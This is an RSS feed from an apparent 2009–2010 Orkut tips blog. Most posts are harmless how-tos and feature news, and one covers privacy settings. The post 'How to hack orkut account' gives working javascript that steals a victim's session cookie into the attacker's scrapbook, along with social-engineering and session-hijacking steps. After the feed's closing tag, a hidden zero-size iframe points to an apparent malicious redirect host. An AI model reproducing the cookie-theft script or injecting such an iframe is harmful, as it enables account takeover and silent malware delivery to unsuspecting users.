<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Scrapia &#187; orkut tips</title>
	<atom:link href="http://www.scrapia.com/tag/orkut-tips/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.scrapia.com</link>
	<description>Orkut Scraps, Tips &#38; Tricks</description>
	<lastBuildDate>Wed, 28 Jul 2010 14:44:46 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Find Email Address Of Orkut Friends</title>
		<link>http://www.scrapia.com/find-email-address-of-orkut-friends/</link>
		<comments>http://www.scrapia.com/find-email-address-of-orkut-friends/#comments</comments>
		<pubDate>Mon, 14 Jun 2010 14:52:39 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[tricks]]></category>
		<category><![CDATA[address]]></category>
		<category><![CDATA[contact]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[find]]></category>
		<category><![CDATA[friends]]></category>
		<category><![CDATA[orkut contacts]]></category>
		<category><![CDATA[orkut friends]]></category>
		<category><![CDATA[orkut tips]]></category>
		<category><![CDATA[orkut tricks]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=178</guid>
		<description><![CDATA[Orkut has no such options which allow you to see any of yours friends email address in there profile as well as in yours friends contact list due to some privacy policy, so it creates problem for a new orkut user to see the email address of his friends in orkut .But now we are [...]]]></description>
			<content:encoded><![CDATA[<p>Orkut has no such options which allow you to see any of yours friends email address in there profile as well as in yours friends contact list due to some privacy policy, so it creates problem for a new orkut user to see the email address of his friends in orkut .But now we are able to retrieve all ours friends email address simply by following few steps mention as under :-</p>
<p>1. <strong>Retrieve orkut email address</strong> of your friends by navigating to Show Friend page by clicking Friends Link which is at the top of the page.</p>
<p>2. At the rightside of that page, which is just below Manage Contacts click Export Contacts  which enables you to download all yours friends email address in .csv format  directly to your computer.</p>
<p>3 .This Process enables you view all your friends details on your Desktop with excel.</p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Ffind-email-address-of-orkut-friends%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/find-email-address-of-orkut-friends/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>How to add orkut share button in blogs</title>
		<link>http://www.scrapia.com/how-to-add-orkut-share-button-in-blogs/</link>
		<comments>http://www.scrapia.com/how-to-add-orkut-share-button-in-blogs/#comments</comments>
		<pubDate>Sat, 22 May 2010 12:47:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[tricks]]></category>
		<category><![CDATA[API]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[blogspot]]></category>
		<category><![CDATA[button]]></category>
		<category><![CDATA[orkut]]></category>
		<category><![CDATA[orkut API]]></category>
		<category><![CDATA[orkut post]]></category>
		<category><![CDATA[orkut scraps]]></category>
		<category><![CDATA[orkut tips]]></category>
		<category><![CDATA[orkut user]]></category>
		<category><![CDATA[share]]></category>
		<category><![CDATA[share button]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=159</guid>
		<description><![CDATA[Learn How to add Orkut Post Share Button in WordPress Blog There will be a header.php file in your wordpress theme&#8217;s folder and you need to paste the following code above &#60;/head&#62; tag &#60;script type=&#8221;text/javascript&#8221; src=&#8221;http://www.google.com/jsapi&#8221;&#62;&#60;/script&#62; &#60;script type=&#8221;text/javascript&#8221;&#62; google.load(&#8216;orkut.share&#8217;, &#8217;1&#8242;); google.setOnLoadCallback(function() { var params = {}; params[google.orkut.share.Field.TITLE] = &#8216;&#60;?php the_title() ?&#62;&#8217;; params[google.orkut.share.Field.DESTINATION_URL] = &#8216;&#60;?php the_permalink() [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Learn How to add Orkut Post Share Button in WordPress Blog</strong></p>
<p>There will be a header.php file in your wordpress theme&#8217;s folder and  you need to paste the following code above &lt;/head&gt; tag</p>
<p>&lt;script type=&#8221;text/javascript&#8221;  src=&#8221;http://www.google.com/jsapi&#8221;&gt;&lt;/script&gt;<br />
&lt;script type=&#8221;text/javascript&#8221;&gt;<br />
google.load(&#8216;orkut.share&#8217;, &#8217;1&#8242;);<br />
google.setOnLoadCallback(function() {<br />
var params = {};<br />
params[google.orkut.share.Field.TITLE] = &#8216;&lt;?php the_title()  ?&gt;&#8217;;<br />
params[google.orkut.share.Field.DESTINATION_URL] = &#8216;&lt;?php  the_permalink() ?&gt;&#8217;;<br />
var connection = new google.orkut.share.Connection(params);<br />
document.getElementById(&#8216;orkut-share&#8217;).onclick =<br />
function(e) { connection.send(&#8216;orkut.com&#8217;, {}); };<br />
}, true);<br />
&lt;/script&gt;</p>
<p>Now save the header.php file and go to Single.php file or wherever you  want to put this button and paste the following code there.</p>
<p>&lt;span id=&#8221;orkut-share&#8221; style=&#8221;cursor:pointer; border:0px solid  black&#8221;&gt;<br />
&lt;img  src=&#8221;http://3.bp.blogspot.com/_eEuHGVw5WLg/SwpFfy4rMqI/AAAAAAAAAAk/jdm-zBiDdv8/s320/share.gif&#8221;  alt=&#8221;Share Orkut&#8221; /&gt;<br />
&lt;/span&gt;</p>
<p>Save the file and you are ready for using the Share Button feature of  ORKUT API.</p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Fhow-to-add-orkut-share-button-in-blogs%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/how-to-add-orkut-share-button-in-blogs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Send files from Orkut Chat</title>
		<link>http://www.scrapia.com/send-files-from-orkut-chat/</link>
		<comments>http://www.scrapia.com/send-files-from-orkut-chat/#comments</comments>
		<pubDate>Fri, 16 Apr 2010 18:45:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[gtalk]]></category>
		<category><![CDATA[chat]]></category>
		<category><![CDATA[files]]></category>
		<category><![CDATA[igoogle]]></category>
		<category><![CDATA[orkut]]></category>
		<category><![CDATA[orkut chat]]></category>
		<category><![CDATA[orkut tips]]></category>
		<category><![CDATA[send files]]></category>
		<category><![CDATA[sharing]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=153</guid>
		<description><![CDATA[Now you can send and share files with your orkut friends via orkut chat. This feature has also been introduced in iGoogle and according to the official orkut blog it will soon includes in Gmail chat. now you don’t need to install anything, simply start a conversation with a friend and click Send a file… [...]]]></description>
			<content:encoded><![CDATA[<p><ins><ins></ins></ins></p>
<p><!-- google_ad_section_start --></p>
<p>Now you can send and share files with your orkut friends via <strong>orkut chat</strong>.</p>
<p>This feature has also been introduced in iGoogle and according to  the <a href="http://en.blog.orkut.com/2010/03/file-transfer-in-orkut-and-igoogle-chat.html">official  orkut blog</a> it will soon includes in Gmail chat.</p>
<p>now you don’t need to install anything, simply start a conversation with a friend and click Send a file… in the ‘Actions’ menu.</p>
<p>and Have fun sharing files with your orkut friends</p>
<p>Enjoy ! <img src='http://www.scrapia.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Fsend-files-from-orkut-chat%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/send-files-from-orkut-chat/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Orkut Kolkata Knight Riders Theme</title>
		<link>http://www.scrapia.com/orkut-kolkata-knight-riders-theme/</link>
		<comments>http://www.scrapia.com/orkut-kolkata-knight-riders-theme/#comments</comments>
		<pubDate>Tue, 13 Apr 2010 18:44:46 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[theme]]></category>
		<category><![CDATA[ipl]]></category>
		<category><![CDATA[ipl 3]]></category>
		<category><![CDATA[kkr]]></category>
		<category><![CDATA[kolkata]]></category>
		<category><![CDATA[kolkata knight riders]]></category>
		<category><![CDATA[nokia]]></category>
		<category><![CDATA[orkut]]></category>
		<category><![CDATA[orkut tips]]></category>
		<category><![CDATA[t20]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=151</guid>
		<description><![CDATA[Now you can have Orkut Official Kolkata Knight Riders Theme ‘Nokia Main bhi Coach’. This is how you can get it: Just go to Orkut themes page. Scroll down to find this new theme. Click on Kolkata Knight Riders Theme set it as your theme. and Enjoy !]]></description>
			<content:encoded><![CDATA[<p>Now you can have Orkut Official <strong>Kolkata Knight Riders Theme </strong>‘Nokia Main bhi Coach’.</p>
<p>This is how you can get it:</p>
<ul>
<li>Just go to <a href="http://www.orkut.co.in/Main#Themes">Orkut themes  page</a>.</li>
<li>Scroll down to find this new theme. Click on <strong>Kolkata Knight Riders Theme </strong></li>
<li> set it as your  theme.</li>
</ul>
<p>and Enjoy ! <img src='http://www.scrapia.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Forkut-kolkata-knight-riders-theme%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/orkut-kolkata-knight-riders-theme/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>5 Tips to Protect Your Privacy on Orkut</title>
		<link>http://www.scrapia.com/5-tips-protect-privacy-orkut/</link>
		<comments>http://www.scrapia.com/5-tips-protect-privacy-orkut/#comments</comments>
		<pubDate>Thu, 08 Oct 2009 12:48:10 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[orkut]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[orkut privacy]]></category>
		<category><![CDATA[orkut tips]]></category>
		<category><![CDATA[photo]]></category>
		<category><![CDATA[privacy]]></category>
		<category><![CDATA[privacy orkut]]></category>
		<category><![CDATA[profile]]></category>
		<category><![CDATA[search]]></category>
		<category><![CDATA[tagging]]></category>
		<category><![CDATA[tips]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=125</guid>
		<description><![CDATA[Top 5 Tips to Protect Your Privacy on Orkut 1. Remove your profile from Google search results Most Orkut users are unaware of this fact that Google can index your Orkut profile and show in it’s search results. Now the whole world can see your profile on Google search results by just entering few of [...]]]></description>
			<content:encoded><![CDATA[<p>Top 5 Tips to Protect Your Privacy on Orkut</p>
<p>1. <strong>Remove your profile from Google search results<br />
</strong></p>
<p>Most Orkut users <a id="KonaLink1" style="text-decoration: underline ! important; position: static;" href="http://www.darkorkut.com/protect-privacy-orkut-tips/#" target="undefined"><span style="color: blue ! important; font-weight: 400; font-size: 13px; position: static;"></span></a>are unaware of this fact that Google can index your Orkut profile and show in it’s search results. Now the whole world can see your profile on Google search results<a id="KonaLink2" style="text-decoration: underline ! important; position: static;" href="http://www.darkorkut.com/protect-privacy-orkut-tips/#" target="undefined"><span style="color: blue ! important; font-weight: 400; font-size: 13px; position: static;"><span style="color: blue ! important; font-family: serif; font-weight: 400; font-size: 13px; position: static;"></span></span></a> by just entering few of your details. Allowing Google to do this means you are exposing yourself before whole world.</p>
<p style="text-align: center;"><a href="http://www.darkorkut.com/wp-content/uploads/2009/05/orkut-privacy-features.png"><img title="Orkut privacy features" src="http://www.darkorkut.com/wp-content/uploads/2009/05/orkut-privacy-features.png" alt="Orkut privacy features" width="453" height="86" /></a></p>
<p>You should restrict Google from indexing and following your profile. To remove your profile from Google search results, navigate to <strong>Settings</strong> &gt;&gt; <strong>Privacy</strong> and select <strong>Hide Information</strong>. You are done.</p>
<p>2. <strong>Allow friend requests from selected people only</strong></p>
<p>Orkut is for developing relationships and hence many people join here to make new friends. Since not all are with good intentions, you should not allow unknown people to add you and view your personal informations such as scraps, photos, videos etc.</p>
<p style="text-align: center;"><a href="http://www.darkorkut.com/wp-content/uploads/2009/05/friend-orkut-email.png"><img title="Provide email address to add as friend" src="http://www.darkorkut.com/wp-content/uploads/2009/05/friend-orkut-email.png" alt="Provide email address to add as friend" width="500" height="101" /></a></p>
<p style="text-align: left;">You can restrict unknown people from sending friend requests by selecting one of three available options. You can either select to receive friend requests from friends of your friends, or from a selected region or from those people who is having your email<a id="KonaLink4" style="text-decoration: underline ! important; position: static;" href="http://www.darkorkut.com/protect-privacy-orkut-tips/#" target="undefined"><span style="color: blue ! important; font-weight: 400; font-size: 13px; position: static;"></span></a> ID. Select the best option for you.</p>
<p style="text-align: left;">3. <strong>Disable photo tagging option</strong></p>
<p style="text-align: left;">If your friend is having one of your photos in his album, any of his friends can add a short identification batch AKA tag to that picture. Adding a tag to a picture means identifying a person from that photo and giving a link to his/her profile. When someone clicks on that tag, he will get redirected to your profile. This will expose your photos, even if you have locked your own photo album.<a id="KonaLink5" style="text-decoration: underline ! important; position: static;" href="http://www.darkorkut.com/protect-privacy-orkut-tips/#" target="undefined"><span style="color: blue ! important; font-weight: 400; font-size: 13px; position: static;"></span></a></p>
<p style="text-align: center;"><a href="http://www.darkorkut.com/wp-content/uploads/2009/05/photo-tagging.png"><img title="Disable photo tagging on Orkut" src="http://www.darkorkut.com/wp-content/uploads/2009/05/photo-tagging.png" alt="Disable photo tagging on Orkut" width="356" height="100" /></a></p>
<p style="text-align: left;">You can always disable photo tagging option by un ticking the <strong>Yes</strong> option under <strong>Privacy</strong> section. Doing this will keep your identity secure <a id="KonaLink6" style="text-decoration: underline ! important; position: static;" href="http://www.darkorkut.com/protect-privacy-orkut-tips/#" target="undefined"><span style="color: blue ! important; font-weight: 400; font-size: 13px; position: static;"></span></a>and protected.</p>
<p style="text-align: left;">4. <strong>Limit access to your profile</strong></p>
<p style="text-align: left;">Would you like to share your personal photos, videos, scraps, testimonials with everyone? Showing your photos to everyone might lead to creating an another profile with your photos. Keeping scrapbook open to all will allow anyone to know your interactions with your friends. So, it’s better to keep them locked.</p>
<p style="text-align: center;"><a href="http://www.darkorkut.com/wp-content/uploads/2009/05/lock-profile.png"><img title="Lock Orkut profile options" src="http://www.darkorkut.com/wp-content/uploads/2009/05/lock-profile.png" alt="Lock Orkut profile options" width="470" height="262" /></a></p>
<p style="text-align: left;">Under Privacy section, you can allow selected people to view your scrapbook, send scraps, view photos, watch videos, see testimonials, read events. You can even hide photos from your friends. Take advantage of these security features.</p>
<p style="text-align: left;">5. <strong>Protect your Email address</strong></p>
<p style="text-align: left;">Last but not the least. Our Email address is the key to our Orkut profile. People can send you friend requests if they know your email address. Email address is something very persoal and should not go public. hackers can hack your Orkut accounts by knowing your email address. So, protecting your Orkut account should be a must-must decession.</p>
<p style="text-align: center;"><a href="http://www.darkorkut.com/wp-content/uploads/2009/05/hide-email-orkut.png"><img title="hide email address on Orkut" src="http://www.darkorkut.com/wp-content/uploads/2009/05/hide-email-orkut.png" alt="hide email address on Orkut" width="500" height="81" /></a></p>
<p style="text-align: left;">You can find a option in the privacy section where you can select if you want to allow people to make a search with your email address and find your Orkut profile. Select “<strong>Don’t allow people to find me</strong>” option.</p>
<p style="text-align: left;">Following above 5 tips will make your Orkut account more secure. If you are really serious about your privacy and don’t want others to interfer in this, follow all above steps.</p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2F5-tips-protect-privacy-orkut%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/5-tips-protect-privacy-orkut/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Add Orkut Friends Birthday with Google Calender</title>
		<link>http://www.scrapia.com/add-orkut-friends-birthday-google-calender/</link>
		<comments>http://www.scrapia.com/add-orkut-friends-birthday-google-calender/#comments</comments>
		<pubDate>Thu, 28 May 2009 17:49:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[orkut]]></category>
		<category><![CDATA[birthday]]></category>
		<category><![CDATA[gmail]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[google calender]]></category>
		<category><![CDATA[orkut features]]></category>
		<category><![CDATA[orkut tips]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=89</guid>
		<description><![CDATA[Orkut has introduced a new feature that will allow orkut users to integrate their Orkut Friend Birthdays with their Google Calendar. Let’s see how we find this feature and how you can enable this integration with your orkut profile… Orkut Birthdays integrated with Google Calendar Navigate to your Orkut Home Page Scroll down to see [...]]]></description>
			<content:encoded><![CDATA[<p>Orkut has introduced a new feature that will allow orkut users to integrate their Orkut Friend Birthdays with their <a href="http://www.google.com/calendar">Google Calendar</a>.</p>
<p>Let’s see how we find this feature and how you can enable this integration with your orkut profile…</p>
<div class="loltitleclassic"><strong>Orkut Birthdays integrated with Google Calendar</strong></div>
<ul>
<li>Navigate to your <a href="http://www.orkut.co.in/Main#Home.aspx">Orkut Home Page</a></li>
</ul>
<p><img class="aligncenter size-full wp-image-1636" title="Step 1" src="http://www.orkutplus.net/blog/wp-content/uploads/2009/03/orkut-brithdays.gif" alt="Step 1" width="433" height="235" /></p>
<ul>
<li> Scroll down to see upcoming birthdays section.</li>
<li> Just below those upcoming brithdays, you’ll see an option to view your friends’ birthdays in Google Calendar.</li>
<li> Click on that option.</li>
</ul>
<p><img class="aligncenter size-full wp-image-1637" title="Step 2" src="http://www.orkutplus.net/blog/wp-content/uploads/2009/03/step-2.gif" alt="Step 2" width="420" height="167" /></p>
<ul>
<li> You will be taken to Google Calendar and will be asked for the confirmation to enable integration.</li>
<li> Choose Yes when prompted.</li>
<li> Now, your friends’ birthdays will be listed in your Google calendar.</li>
</ul>
<p><img class="aligncenter size-full wp-image-1638" title="Step 3" src="http://www.orkutplus.net/blog/wp-content/uploads/2009/03/step-3.gif" alt="Step 3" width="362" height="340" /></p>
<ul>
<li> Click on the listing to get more details.</li>
</ul>
<p><img class="aligncenter size-full wp-image-1639" title="Step 4" src="http://www.orkutplus.net/blog/wp-content/uploads/2009/03/step-5.gif" alt="Step 4" width="470" height="174" /></p>
<ul>
<li> You even have a scrapbook link of the friend who is celebrating his/her birthday.</li>
</ul>
<p>Go ahead and add this great feature for <strong>google calendar</strong> and you will surely never miss a <strong>birthday</strong> from now on for your orkut friends birthday.</p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Fadd-orkut-friends-birthday-google-calender%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/add-orkut-friends-birthday-google-calender/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to hack orkut account</title>
		<link>http://www.scrapia.com/hack-orkut-account/</link>
		<comments>http://www.scrapia.com/hack-orkut-account/#comments</comments>
		<pubDate>Mon, 11 May 2009 05:57:09 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[hacks]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[orkut]]></category>
		<category><![CDATA[orkut account]]></category>
		<category><![CDATA[orkut hack]]></category>
		<category><![CDATA[orkut hacks]]></category>
		<category><![CDATA[orkut tips]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=84</guid>
		<description><![CDATA[Want to know how to hack orkut account ? First get firefox and the cookie editor plugin for it…u will need them… Then make two fake accounts…u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised…the choice [...]]]></description>
			<content:encoded><![CDATA[<p>Want to know <strong>how to hack orkut account ? </strong></p>
<p>First get firefox and the <a style="color: #3366ff;" href="https://addons.mozilla.org/en-US/firefox/addon/573">cookie editor plugin</a> for it…u will need them…</p>
<p>Then make two fake accounts…u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised…the choice is yours though..</p>
<p>javascript:nobody=replyForm;nobody.toUserId.value=62915936;<br />
nobody.scrapText.value=eval<br />
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,<br />
111,111,107,105,101)); nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;<br />
nobody.submit()</p>
<p>U see the 62915936 part? Thats the one u need to edit to get the cookie to your account…..</p>
<p>Now here is the script Code:</p>
<p>HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:</p>
<p>1) Go to YOUR ALBUM section.</p>
<p>2) Go to ANY photo and right click on it , see the properties of your display image…u will see something like 12345678.jpg</p>
<p>3) There will be a eight digit value.</p>
<p>4) Now put that value in the above javascript.</p>
<p>5) Thats it.</p>
<p>Now your javascript will look like:</p>
<p>javascript:nobody=replyForm;nobody.toUserId.value=yournumber;<br />
nobody.scrapText.value=eval<br />
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,<br />
111,111,107,105,101));<br />
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;<br />
nobody.submit()</p>
<p>Now give this script to the victim , ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook.</p>
<p>Now after getting a cookie…</p>
<p>1) Go to your home page</p>
<p>2) Open the cookie editor plugin(TOOLS–&gt;COOKIE EDITOR).</p>
<p>3) Type orkut in the text box and click filter/refresh.look for orkut_state cookie.</p>
<p>4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part…</p>
<p>5) THATS IT!!</p>
<p>ANOTHER SCRIPT : (100%working)</p>
<p>javascript:nobody=replyForm;nobody.toUserId.value=53093255;</p>
<p>nobody.scrapText.value=document.cookie;nobody.</p>
<p>action=’scrapbook.aspx?Action.submit’;nobody.submit()</p>
<p>Put ur eight digit number in the place of (53093255)</p>
<p><em>happy <strong>orkut hacking</strong> <img src='http://www.scrapia.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </em></p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Fhack-orkut-account%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/hack-orkut-account/feed/</wfw:commentRss>
		<slash:comments>20</slash:comments>
		</item>
		<item>
		<title>Orkut Group Chat</title>
		<link>http://www.scrapia.com/orkut-group-chat/</link>
		<comments>http://www.scrapia.com/orkut-group-chat/#comments</comments>
		<pubDate>Tue, 05 May 2009 16:34:34 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[orkut]]></category>
		<category><![CDATA[chat]]></category>
		<category><![CDATA[group chat]]></category>
		<category><![CDATA[orkut tips]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=76</guid>
		<description><![CDATA[Orkut Group chat &#8211; Orkut has added a new feature &#8211; Group Chat. As this is self explanatory, this feature will allow you to have a group chat with your orkut friends. Go ahead and try out the new features if you haven&#8217;t already]]></description>
			<content:encoded><![CDATA[<p><strong>Orkut Group chat</strong> &#8211; Orkut has added a new feature &#8211; Group Chat. As this is self explanatory, this feature will allow you to have a group chat with your orkut friends.</p>
<p>Go ahead and try out the new features if you haven&#8217;t already</p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Forkut-group-chat%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/orkut-group-chat/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Chat with friends online in Orkut</title>
		<link>http://www.scrapia.com/chat-friends-online-orkut/</link>
		<comments>http://www.scrapia.com/chat-friends-online-orkut/#comments</comments>
		<pubDate>Sat, 02 May 2009 16:44:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[orkut]]></category>
		<category><![CDATA[gtalk]]></category>
		<category><![CDATA[orkut chat]]></category>
		<category><![CDATA[orkut tips]]></category>
		<category><![CDATA[orkut tricks]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=72</guid>
		<description><![CDATA[Orkut has introduced a new feature which allows you to view and chat with your orkut friends who are also online. I am sure a lot of you have notice this features. This idea was basically copied from facebook. Find out more at Orkut official blog.]]></description>
			<content:encoded><![CDATA[<p>Orkut has introduced a new feature which allows you to view and chat with your orkut friends who are also online.</p>
<p>I am sure a lot of you have notice this features. This idea was basically copied from facebook.</p>
<p>Find out more at <a href="http://en.blog.orkut.com/2009/04/find-your-online-friends-with-new-orkut.html">Orkut official blog</a>.</p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Fchat-friends-online-orkut%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/chat-friends-online-orkut/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Chat in Orkut without google account</title>
		<link>http://www.scrapia.com/chat-in-orkut-without-gmail/</link>
		<comments>http://www.scrapia.com/chat-in-orkut-without-gmail/#comments</comments>
		<pubDate>Thu, 30 Apr 2009 16:39:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[orkut]]></category>
		<category><![CDATA[gmail]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[gtalk]]></category>
		<category><![CDATA[orkut member]]></category>
		<category><![CDATA[orkut tips]]></category>
		<category><![CDATA[orkut tricks]]></category>

		<guid isPermaLink="false">http://www.scrapia.com/?p=70</guid>
		<description><![CDATA[Most of you must have noticed that Google Talk was not available for chatting on Orkut for people who did not have a Gmail account. Thankfully, this will not be a hindrance for Orkut users any more. Now, Google’s chat feature is being enabled for all Orkut users, irrespective of whether they have a Gmail [...]]]></description>
			<content:encoded><![CDATA[<p>Most of you must have noticed that Google Talk was not available for chatting on Orkut for people who did not have a Gmail account. Thankfully, this will not be a hindrance for Orkut users any more.</p>
<p>Now, Google’s chat feature is being enabled for all Orkut users, irrespective of whether they have a Gmail ID or not. You will be able to use your existing email address as your user name and chat on the Google Talk network without any hassles.</p>
<p>This is still work in progress, so if you do not see this feature enabled for you yet, give it a few more days, it must be on its way into your account, for sure.  <img src='http://www.scrapia.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>As a security measure, you will be required to do a simple email verification in order to use this feature.</p>
<p>Click here to read more: Verifying Your Google Account: How it works</p>
<p>(Source: google.talkabout)</p>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.scrapia.com%2Fchat-in-orkut-without-gmail%2F&amp;layout=standard&amp;show-faces=true&amp;width=500&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0″ allowTransparency="true" style="border:none; overflow:hidden; width:500px; height:60px"></iframe>]]></content:encoded>
			<wfw:commentRss>http://www.scrapia.com/chat-in-orkut-without-gmail/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
